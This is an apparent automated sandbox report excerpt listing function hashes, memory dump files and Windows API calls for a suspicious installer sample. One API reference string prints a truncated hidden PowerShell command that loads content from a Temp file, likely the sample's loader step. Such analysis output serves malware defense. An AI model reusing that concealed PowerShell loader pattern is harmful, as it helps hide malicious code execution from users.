                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                              • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                                                              • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                              • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                              • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                                                              • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                              • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                              • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                                                              • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                              • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                              • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                                                              • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                              • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                              • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                                                              • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                              • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                              • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                                                              • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                              • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                              • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                                                              • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                              • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004032D6
                                                                                                • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                                                              • SetFilePointer.KERNELBASE(0013942D,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer$CountTick
                                                                                              • String ID:
                                                                                              • API String ID: 1092082344-0
                                                                                              • Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                              • Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
                                                                                              • Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                              • Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                              • Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
                                                                                              • Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                              • Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,formagen\Uninstall\frustulose,00000000,00000011,00000002), ref: 00402551
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3356406503-0
                                                                                              • Opcode ID: 997212bab87f25c02565dd92bd657addcdedc5171226b27ca572324a25b4b09c
                                                                                              • Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
                                                                                              • Opcode Fuzzy Hash: 997212bab87f25c02565dd92bd657addcdedc5171226b27ca572324a25b4b09c
                                                                                              • Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(00000039,00000039,00000000,00000000,004281E0,00000800,00000002,?,00000000,00000039,00000039,004281E0,?,?,004064F2,80000002), ref: 004062C4
                                                                                              • RegCloseKey.KERNELBASE(00000039,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,00000039,004281E0,00000039,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 004062CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3356406503-0
                                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                              • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                              • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                              • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                              • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                              • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 004054F7
                                                                                                • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 00405543
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2896919175-0
                                                                                              • Opcode ID: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
                                                                                              • Instruction ID: 461e397135febbc30a5c9d3c302966ffa091eeef35a1e5a31f22b0d6bdb391fd
                                                                                              • Opcode Fuzzy Hash: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
                                                                                              • Instruction Fuzzy Hash: E1F0F072600A00EBE7215B80AD01B267365EBC4304F41407BFE88723A4C77A4C02CBAE
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableShow
                                                                                              • String ID:
                                                                                              • API String ID: 1136574915-0
